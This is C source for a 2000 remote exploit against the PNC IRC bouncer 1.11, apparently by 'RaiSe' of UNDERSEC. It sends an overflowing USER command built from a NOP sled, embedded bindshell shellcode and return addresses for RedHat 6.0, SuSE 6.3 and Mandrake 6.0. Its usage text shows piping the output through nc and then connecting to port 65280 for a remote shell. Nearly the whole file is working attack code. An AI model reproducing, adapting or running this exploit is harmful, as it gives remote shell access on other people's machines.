/* PNC Bouncer Xploit por RaiSe           [2000]*/
/* Testeado en version 1.11               [2000]*/
/*                                        [2000]*/
/* Offset en RedHat 6.0 0xbffffb24        [2000]*/
/* Offset en SuSe 6.3 0xbffff824 (Thx |QuasaR|) */
/* Offset en Mandrake 6.0 0xbffff3e4 (Thx PowR) */
/* bindshell by ADM                       [2000]*/
/*                                        [2000]*/
/* UNDERSEC Security Team                 [2000]*/
/* http://www.undersec.com                [2000]*/

#include <stdio.h>

int i;
char *ptr;
unsigned long *ptr2,dire;
char bindshell[] =
  "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
  "\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
  "\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
  "\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
  "\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
  "\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xff\x66\x89\x46\x0e\x8d"
  "\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
  "\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
  "\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
  "\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
  "\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
  "\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
  "\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
  "\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77"; 

char buffer[1091];

int main(int argc, char *argv[])
{
  if (argc<3) {
    printf("\nPNC Bouncer Xploit por RaiSe");
    printf("\nUNDERSEC Security TEAM\nhttp://www.undersec.com");
    printf("\n\nModo de empleo: %s offset n | nc host puerto\n",argv[0]);
    printf("                nc host 65280\n\n");
    printf("n=1 - RedHat 6.0\nn=2 - SuSe 6.3\nn=3 - Mandrake 6.0\noffset normalmente 0 (en mandrake 1200)\n\n");
    exit(0);
  }

  if ((strcmp(argv[2],"1")) == 0) { dire=0xbffffb24; }
  if ((strcmp(argv[2],"2")) == 0) { dire=0xbffff824; }
  if ((strcmp(argv[2],"3")) == 0) { dire=0xbffff3e4; }

  for(i=0;i<1091;i++)
    buffer[i]=0x00;
    ptr=buffer;

  for(i=0;i<1011-strlen(bindshell);i++)
    *(ptr++)=0x90;
  for(i=0;i<strlen(bindshell);i++)
    *(ptr++)=bindshell[i];
  ptr2=(long *)ptr;
  for(i=0;i<20;i++)
    *(ptr2++)=dire+atoi(argv[1]);

  sleep(4);
  printf("USER %s\n",buffer);
}
/*                    www.hack.co.za           [19 July 2000]*/